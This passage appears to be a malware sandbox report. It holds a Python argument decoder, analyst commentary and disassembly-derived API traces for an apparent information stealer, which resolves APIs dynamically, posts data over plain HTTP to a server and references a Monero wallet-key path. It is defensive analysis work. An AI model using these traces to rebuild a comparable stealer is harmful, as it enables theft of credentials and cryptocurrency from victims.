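FLAGS = {("HttpOpenRequestA", 6): INTERNET_FLAGS, ("VirtualProtect", 2): PAGE_PROTECT}
ENUMS = {
    ("InternetOpenA", 1): {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                           3: "INTERNET_OPEN_TYPE_PROXY"},
    ("InternetConnectA", 5): {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER",
                              3: "INTERNET_SERVICE_HTTP"},
    ("InternetSetOptionA", 1): {31: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("HttpQueryInfoA", 1): {19: "HTTP_QUERY_STATUS_CODE", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"},
}
INT_PARAMS = {("InternetReadFile", 2): "dwNumberOfBytesToRead",
              ("GetWindowsDirectoryA", 1): "uSize", ("VirtualProtect", 1): "dwSize"}


def parse_api_line(line):
    """One '• Api.MODULE(args), ref: addr' line -> dict, or None if not an API line."""
    m = LINE.match(line)
    if not m:
        return None
    args = [] if m.group("args") is None else [a.strip() for a in m.group("args").split(",")]
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None}


def decode_flags(value, table):
    """Split a bitmask into its named bits, highest first; leftover bits stay hex."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    return names + ([hex(rest)] if rest else [])


def decode_call(call):
    """Map argument index -> readable meaning for the arguments we have a table for."""
    notes = {}
    for i, raw in enumerate(call["args"]):
        if not HEX.fullmatch(raw):            # '?' (unresolved) or a literal such as GET
            continue
        value, key = int(raw, 16), (call["api"], i)
        if key in FLAGS:
            notes[i] = "|".join(decode_flags(value, FLAGS[key])) or "0"
        elif key in ENUMS:
            notes[i] = ENUMS[key].get(value, f"unknown({value})")
        elif key in INT_PARAMS:
            notes[i] = f"{INT_PARAMS[key]}={value}" + (" (MAX_PATH)" if value == 260 else "")
    return notes


def decode_listing(text):
    """Parse every API line in a listing and attach the decoded arguments."""
    calls = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            call["decoded"] = decode_call(call)
            calls.append(call)
    return calls


if __name__ == "__main__":
    for call in decode_listing(SAMPLE_LINES):
        if call["decoded"]:
            print(f"{call['ref']:08X} {call['api']}: {call['decoded']}")
```

Decoded, the listings say the following. The only VirtualProtect in 7b4610 applies PAGE_GUARD to a 4-byte region, which is the behaviour the "create guard pages" signature at the top of this report refers to; the thirty references to the decoy sentence in that function's Strings list are spaced 0xB bytes apart within each run, i.e. the same short instruction sequence is stamped over the string, which reads as filler rather than data the code consumes. 7b62d0 opens a direct (non-proxy) session, connects with INTERNET_SERVICE_HTTP, issues GET with KEEP_CONNECTION|PRAGMA_NOCACHE and no INTERNET_FLAG_SECURE, writes INTERNET_OPTION_SECURITY_FLAGS only on the branch through block 1055, checks HTTP_QUERY_STATUS_CODE and then reads the body 1999 bytes at a time. 7c7690 asks for the Windows directory with a MAX_PATH buffer, and its ":", "C" and "\" strings next to GetVolumeInformationA are consistent with building a volume-serial based machine identifier from the C:\ root, although the report does not show the wsprintfA format string, so the exact layout of that identifier is not established here.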
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007B11B7), ref: 007C7A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 007C7A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: b1e9634034387b0ee40efa2053257a24feb691877a2d10cebfabe35922800ba8
                                        • Instruction ID: e57ca653957c1d48f35e59bf2accebb8d5658b556034c82670bd107da2f1b720
                                        • Opcode Fuzzy Hash: b1e9634034387b0ee40efa2053257a24feb691877a2d10cebfabe35922800ba8
                                        • Instruction Fuzzy Hash: 9DF0AFB1908209EBC700CFC8DC45FAEBBB8EB08711F10021AF605A2680C7745900CBA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 23f5136a47a93c3b25e4dd6a2e89db4ab3fdc22bcc0880c4040701b130c03cd3
                                        • Instruction ID: a34b550e550b240f1940a2b200ef7a909f2dde9a01bca94691c559a4c0aa3c50
                                        • Opcode Fuzzy Hash: 23f5136a47a93c3b25e4dd6a2e89db4ab3fdc22bcc0880c4040701b130c03cd3
                                        • Instruction Fuzzy Hash: 63D05E7490430C9BCB00DFE0988DADDBB78FB08615F500654D90572650EA309452CB65

                                        Control-flow Graph

                                        control_flow_graph 633 7c9f20-7c9f2a 634 7ca346-7ca3da LoadLibraryA * 8 633->634 635 7c9f30-7ca341 GetProcAddress * 43 633->635 636 7ca3dc-7ca451 GetProcAddress * 5 634->636 637 7ca456-7ca45d 634->637 635->634 636->637 638 7ca526-7ca52d 637->638 639 7ca463-7ca521 GetProcAddress * 8 637->639 640 7ca52f-7ca5a3 GetProcAddress * 5 638->640 641 7ca5a8-7ca5af 638->641 639->638 640->641 642 7ca5b5-7ca642 GetProcAddress * 6 641->642 643 7ca647-7ca64e 641->643 642->643 644 7ca72f-7ca736 643->644 645 7ca654-7ca72a GetProcAddress * 9 643->645 646 7ca738-7ca7ad GetProcAddress * 5 644->646 647 7ca7b2-7ca7b9 644->647 645->644 646->647 648 7ca7ec-7ca7f3 647->648 649 7ca7bb-7ca7e7 GetProcAddress * 2 647->649 650 7ca825-7ca82c 648->650 651 7ca7f5-7ca820 GetProcAddress * 2 648->651 649->648 652 7ca922-7ca929 650->652 653 7ca832-7ca91d GetProcAddress * 10 650->653 651->650 654 7ca98d-7ca994 652->654 655 7ca92b-7ca988 GetProcAddress * 4 652->655 653->652 656 7ca9ae-7ca9b5 654->656 657 7ca996-7ca9a9 GetProcAddress 654->657 655->654 658 7caa18-7caa19 656->658 659 7ca9b7-7caa13 GetProcAddress * 4 656->659 657->656 659->658
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,016452C8), ref: 007C9F3D
                                        • GetProcAddress.KERNEL32(77190000,01644FC8), ref: 007C9F55
                                        • GetProcAddress.KERNEL32(77190000,01659020), ref: 007C9F6E
                                        • GetProcAddress.KERNEL32(77190000,01659038), ref: 007C9F86
                                        • GetProcAddress.KERNEL32(77190000,01659050), ref: 007C9F9E
                                        • GetProcAddress.KERNEL32(77190000,0165D380), ref: 007C9FB7
                                        • GetProcAddress.KERNEL32(77190000,0164A500), ref: 007C9FCF
                                        • GetProcAddress.KERNEL32(77190000,0165D560), ref: 007C9FE7
                                        • GetProcAddress.KERNEL32(77190000,0165D5F0), ref: 007CA000
                                        • GetProcAddress.KERNEL32(77190000,0165D4A0), ref: 007CA018
                                        • GetProcAddress.KERNEL32(77190000,0165D398), ref: 007CA030
                                        • GetProcAddress.KERNEL32(77190000,016452E8), ref: 007CA049
                                        • GetProcAddress.KERNEL32(77190000,01645308), ref: 007CA061
                                        • GetProcAddress.KERNEL32(77190000,016451A8), ref: 007CA079
                                        • GetProcAddress.KERNEL32(77190000,01645048), ref: 007CA092
                                        • GetProcAddress.KERNEL32(77190000,0165D4D0), ref: 007CA0AA
                                        • GetProcAddress.KERNEL32(77190000,0165D3B0), ref: 007CA0C2
                                        • GetProcAddress.KERNEL32(77190000,0164A528), ref: 007CA0DB
                                        • GetProcAddress.KERNEL32(77190000,016450A8), ref: 007CA0F3
                                        • GetProcAddress.KERNEL32(77190000,0165D620), ref: 007CA10B
                                        • GetProcAddress.KERNEL32(77190000,0165D3C8), ref: 007CA124
                                        • GetProcAddress.KERNEL32(77190000,0165D5D8), ref: 007CA13C
                                        • GetProcAddress.KERNEL32(77190000,0165D3E0), ref: 007CA154
                                        • GetProcAddress.KERNEL32(77190000,01645068), ref: 007CA16D
                                        • GetProcAddress.KERNEL32(77190000,0165D578), ref: 007CA185
                                        • GetProcAddress.KERNEL32(77190000,0165D3F8), ref: 007CA19D
                                        • GetProcAddress.KERNEL32(77190000,0165D608), ref: 007CA1B6
                                        • GetProcAddress.KERNEL32(77190000,0165D518), ref: 007CA1CE
                                        • GetProcAddress.KERNEL32(77190000,0165D410), ref: 007CA1E6
                                        • GetProcAddress.KERNEL32(77190000,0165D500), ref: 007CA1FF
                                        • GetProcAddress.KERNEL32(77190000,0165D428), ref: 007CA217
                                        • GetProcAddress.KERNEL32(77190000,0165D590), ref: 007CA22F
                                        • GetProcAddress.KERNEL32(77190000,0165D440), ref: 007CA248
                                        • GetProcAddress.KERNEL32(77190000,0164FBF8), ref: 007CA260
                                        • GetProcAddress.KERNEL32(77190000,0165D338), ref: 007CA278
                                        • GetProcAddress.KERNEL32(77190000,0165D350), ref: 007CA291
                                        • GetProcAddress.KERNEL32(77190000,016451C8), ref: 007CA2A9
                                        • GetProcAddress.KERNEL32(77190000,0165D368), ref: 007CA2C1
                                        • GetProcAddress.KERNEL32(77190000,01645348), ref: 007CA2DA
                                        • GetProcAddress.KERNEL32(77190000,0165D4E8), ref: 007CA2F2
                                        • GetProcAddress.KERNEL32(77190000,0165D530), ref: 007CA30A
                                        • GetProcAddress.KERNEL32(77190000,01645368), ref: 007CA323
                                        • GetProcAddress.KERNEL32(77190000,01644F88), ref: 007CA33B
                                        • LoadLibraryA.KERNEL32(0165D548,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA34D
                                        • LoadLibraryA.KERNEL32(0165D488,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA35E
                                        • LoadLibraryA.KERNEL32(0165D5A8,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA370
                                        • LoadLibraryA.KERNEL32(0165D5C0,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA382
                                        • LoadLibraryA.KERNEL32(0165D458,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA393
                                        • LoadLibraryA.KERNEL32(0165D470,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA3A5
                                        • LoadLibraryA.KERNEL32(0165D4B8,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA3B7
                                        • LoadLibraryA.KERNEL32(0165D680,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA3C8
                                        • GetProcAddress.KERNEL32(77040000,01644FA8), ref: 007CA3EA
                                        • GetProcAddress.KERNEL32(77040000,0165D668), ref: 007CA402
                                        • GetProcAddress.KERNEL32(77040000,01658C68), ref: 007CA41A
                                        • GetProcAddress.KERNEL32(77040000,0165D638), ref: 007CA433
                                        • GetProcAddress.KERNEL32(77040000,016450C8), ref: 007CA44B
                                        • GetProcAddress.KERNEL32(704D0000,0164A618), ref: 007CA470
                                        • GetProcAddress.KERNEL32(704D0000,016455A8), ref: 007CA489
                                        • GetProcAddress.KERNEL32(704D0000,0164A690), ref: 007CA4A1
                                        • GetProcAddress.KERNEL32(704D0000,0165D728), ref: 007CA4B9
                                        • GetProcAddress.KERNEL32(704D0000,0165D7E8), ref: 007CA4D2
                                        • GetProcAddress.KERNEL32(704D0000,01645488), ref: 007CA4EA
                                        • GetProcAddress.KERNEL32(704D0000,016454A8), ref: 007CA502
                                        • GetProcAddress.KERNEL32(704D0000,0165D698), ref: 007CA51B
                                        • GetProcAddress.KERNEL32(768D0000,01645548), ref: 007CA53C
                                        • GetProcAddress.KERNEL32(768D0000,01645568), ref: 007CA554
                                        • GetProcAddress.KERNEL32(768D0000,0165D6B0), ref: 007CA56D
                                        • GetProcAddress.KERNEL32(768D0000,0165D6F8), ref: 007CA585
                                        • GetProcAddress.KERNEL32(768D0000,01645668), ref: 007CA59D
                                        • GetProcAddress.KERNEL32(75790000,0164A910), ref: 007CA5C3
                                        • GetProcAddress.KERNEL32(75790000,0164A5F0), ref: 007CA5DB
                                        • GetProcAddress.KERNEL32(75790000,0165D6C8), ref: 007CA5F3
                                        • GetProcAddress.KERNEL32(75790000,01645648), ref: 007CA60C
                                        • GetProcAddress.KERNEL32(75790000,016455C8), ref: 007CA624
                                        • GetProcAddress.KERNEL32(75790000,0164A7D0), ref: 007CA63C
                                        • GetProcAddress.KERNEL32(75A10000,0165D710), ref: 007CA662
                                        • GetProcAddress.KERNEL32(75A10000,01645688), ref: 007CA67A
                                        • GetProcAddress.KERNEL32(75A10000,01658B18), ref: 007CA692
                                        • GetProcAddress.KERNEL32(75A10000,0165D7D0), ref: 007CA6AB
                                        • GetProcAddress.KERNEL32(75A10000,0165D650), ref: 007CA6C3
                                        • GetProcAddress.KERNEL32(75A10000,01645528), ref: 007CA6DB
                                        • GetProcAddress.KERNEL32(75A10000,01645508), ref: 007CA6F4
                                        • GetProcAddress.KERNEL32(75A10000,0165D6E0), ref: 007CA70C
                                        • GetProcAddress.KERNEL32(75A10000,0165D740), ref: 007CA724
                                        • GetProcAddress.KERNEL32(76850000,01645588), ref: 007CA746
                                        • GetProcAddress.KERNEL32(76850000,0165D758), ref: 007CA75E
                                        • GetProcAddress.KERNEL32(76850000,0165D770), ref: 007CA776
                                        • GetProcAddress.KERNEL32(76850000,0165D788), ref: 007CA78F
                                        • GetProcAddress.KERNEL32(76850000,0165D7A0), ref: 007CA7A7
                                        • GetProcAddress.KERNEL32(75690000,01645408), ref: 007CA7C8
                                        • GetProcAddress.KERNEL32(75690000,016456E8), ref: 007CA7E1
                                        • GetProcAddress.KERNEL32(769C0000,016454C8), ref: 007CA802
                                        • GetProcAddress.KERNEL32(769C0000,0165D7B8), ref: 007CA81A
                                        • GetProcAddress.KERNEL32(6F8C0000,01645428), ref: 007CA840
                                        • GetProcAddress.KERNEL32(6F8C0000,016456A8), ref: 007CA858
                                        • GetProcAddress.KERNEL32(6F8C0000,016455E8), ref: 007CA870
                                        • GetProcAddress.KERNEL32(6F8C0000,0165D2A8), ref: 007CA889
                                        • GetProcAddress.KERNEL32(6F8C0000,01645708), ref: 007CA8A1
                                        • GetProcAddress.KERNEL32(6F8C0000,01645388), ref: 007CA8B9
                                        • GetProcAddress.KERNEL32(6F8C0000,01645448), ref: 007CA8D2
                                        • GetProcAddress.KERNEL32(6F8C0000,01645468), ref: 007CA8EA
                                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 007CA901
                                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 007CA917
                                        • GetProcAddress.KERNEL32(75D90000,0165D0E0), ref: 007CA939
                                        • GetProcAddress.KERNEL32(75D90000,01658C28), ref: 007CA951
                                        • GetProcAddress.KERNEL32(75D90000,0165D230), ref: 007CA969
                                        • GetProcAddress.KERNEL32(75D90000,0165D1D0), ref: 007CA982
                                        • GetProcAddress.KERNEL32(76470000,016454E8), ref: 007CA9A3
                                        • GetProcAddress.KERNEL32(70220000,0165D2D8), ref: 007CA9C4
                                        • GetProcAddress.KERNEL32(70220000,01645728), ref: 007CA9DD
                                        • GetProcAddress.KERNEL32(70220000,0165D248), ref: 007CA9F5
                                        • GetProcAddress.KERNEL32(70220000,0165D068), ref: 007CAA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: fd42cc634e57cddb6baf1491209389bccb00b56da104c07621ddb70727f35e8d
                                        • Instruction ID: 900feb3fb8e7c28204e6d2f079054b0d924b7149e5ee95d2646e1dc5365a4d0c
                                        • Opcode Fuzzy Hash: fd42cc634e57cddb6baf1491209389bccb00b56da104c07621ddb70727f35e8d
                                        • Instruction Fuzzy Hash: A562FDB6618200DFD345EFE8ED8CA5A7BB9B74D701760861ABA09C3670E735D943CB60

                                        Control-flow Graph

                                        control_flow_graph 801 7b48d0-7b4992 call 7caab0 call 7b4800 call 7caa50 * 5 InternetOpenA StrCmpCA 816 7b499b-7b499f 801->816 817 7b4994 801->817 818 7b4f1b-7b4f43 InternetCloseHandle call 7cade0 call 7ba210 816->818 819 7b49a5-7b4b1d call 7c8cf0 call 7cac30 call 7cabb0 call 7cab10 * 2 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cac30 call 7cabb0 call 7cab10 * 2 InternetConnectA 816->819 817->816 828 7b4f82-7b4ff2 call 7c8b20 * 2 call 7caab0 call 7cab10 * 8 818->828 829 7b4f45-7b4f7d call 7cab30 call 7cacc0 call 7cabb0 call 7cab10 818->829 819->818 905 7b4b23-7b4b27 819->905 829->828 906 7b4b29-7b4b33 905->906 907 7b4b35 905->907 908 7b4b3f-7b4b72 HttpOpenRequestA 906->908 907->908 909 7b4b78-7b4e78 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7caa50 call 7cac30 * 2 call 7cabb0 call 7cab10 * 2 call 7cade0 lstrlen call 7cade0 * 2 lstrlen call 7cade0 HttpSendRequestA 908->909 910 7b4f0e-7b4f15 InternetCloseHandle 908->910 1021 7b4e82-7b4eac InternetReadFile 909->1021 910->818 1022 7b4eae-7b4eb5 1021->1022 1023 7b4eb7-7b4f09 InternetCloseHandle call 7cab10 1021->1023 1022->1023 1024 7b4eb9-7b4ef7 call 7cacc0 call 7cabb0 call 7cab10 1022->1024 1023->910 1024->1021
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B4965
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B4B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,007D0DDE,00000000,?,?,00000000,?,",00000000,?,0165F2B0), ref: 007B4E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007B4E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007B4E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007B4E99
                                        • InternetCloseHandle.WININET(00000000), ref: 007B4EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 007B4F15
                                        • HttpOpenRequestA.WININET(00000000,0165F380,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B4B65
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 007B4F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 1a5ed569b930079d8e50478728128188cefe773d6a173c3c719b4f3c665e6604
                                        • Instruction ID: 07241186ffa65359442f6b8899843c4d4341c621a7816adbb84379243477301d
                                        • Opcode Fuzzy Hash: 1a5ed569b930079d8e50478728128188cefe773d6a173c3c719b4f3c665e6604
                                        • Instruction Fuzzy Hash: A812ECB291021CEACB14EB90DDAAFEEB37AAF14305F50419DB10662191DF786F48CB65

                                        Control-flow Graph

                                        control_flow_graph 1090 7c5760-7c57c7 call 7c5d20 call 7cab30 * 3 call 7caa50 * 4 1106 7c57cc-7c57d3 1090->1106 1107 7c57d5-7c5806 call 7cab30 call 7caab0 call 7b1590 call 7c5440 1106->1107 1108 7c5827-7c589c call 7caa50 * 2 call 7b1590 call 7c5510 call 7cabb0 call 7cab10 call 7cade0 StrCmpCA 1106->1108 1124 7c580b-7c5822 call 7cabb0 call 7cab10 1107->1124 1134 7c58e3-7c58f9 call 7cade0 StrCmpCA 1108->1134 1138 7c589e-7c58de call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1108->1138 1124->1134 1139 7c5a2c-7c5a94 call 7cabb0 call 7cab30 * 2 call 7b16b0 call 7cab10 * 4 call 7b1670 call 7b1550 1134->1139 1140 7c58ff-7c5906 1134->1140 1138->1134 1269 7c5d13-7c5d16 1139->1269 1142 7c590c-7c5913 1140->1142 1143 7c5a2a-7c5aaf call 7cade0 StrCmpCA 1140->1143 1147 7c596e-7c59e3 call 7caa50 * 2 call 7b1590 call 7c5510 call 7cabb0 call 7cab10 call 7cade0 StrCmpCA 1142->1147 1148 7c5915-7c5969 call 7cab30 call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1142->1148 1162 7c5ab5-7c5abc 1143->1162 1163 7c5be1-7c5c49 call 7cabb0 call 7cab30 * 2 call 7b16b0 call 7cab10 * 4 call 7b1670 call 7b1550 1143->1163 1147->1143 1246 7c59e5-7c5a25 call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1147->1246 1148->1143 1169 7c5bdf-7c5c64 call 7cade0 StrCmpCA 1162->1169 1170 7c5ac2-7c5ac9 1162->1170 1163->1269 1198 7c5c78-7c5ce1 call 7cabb0 call 7cab30 * 2 call 7b16b0 call 7cab10 * 4 call 7b1670 call 7b1550 1169->1198 1199 7c5c66-7c5c71 Sleep 1169->1199 1177 7c5acb-7c5b1e call 7cab30 call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1170->1177 1178 7c5b23-7c5b98 call 7caa50 * 2 call 7b1590 call 7c5510 call 7cabb0 call 7cab10 call 7cade0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 7c5b9a-7c5bda call 7caab0 call 7b1590 call 7c5440 call 7cabb0 call 7cab10 1178->1275 1198->1269 1199->1106 1246->1143 1275->1169
                                        APIs
                                          • Part of subcall function 007CAB30: lstrlen.KERNEL32(007B4F55,?,?,007B4F55,007D0DDF), ref: 007CAB3B
                                          • Part of subcall function 007CAB30: lstrcpy.KERNEL32(007D0DDF,00000000), ref: 007CAB95
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C58F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5AA7
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007C5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5478
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5568
                                          • Part of subcall function 007C5510: lstrlen.KERNEL32(00000000), ref: 007C557F
                                          • Part of subcall function 007C5510: StrStrA.SHLWAPI(00000000,00000000), ref: 007C55B4
                                          • Part of subcall function 007C5510: lstrlen.KERNEL32(00000000), ref: 007C55D3
                                          • Part of subcall function 007C5510: lstrlen.KERNEL32(00000000), ref: 007C55FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C59DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007C5C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 007C5C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
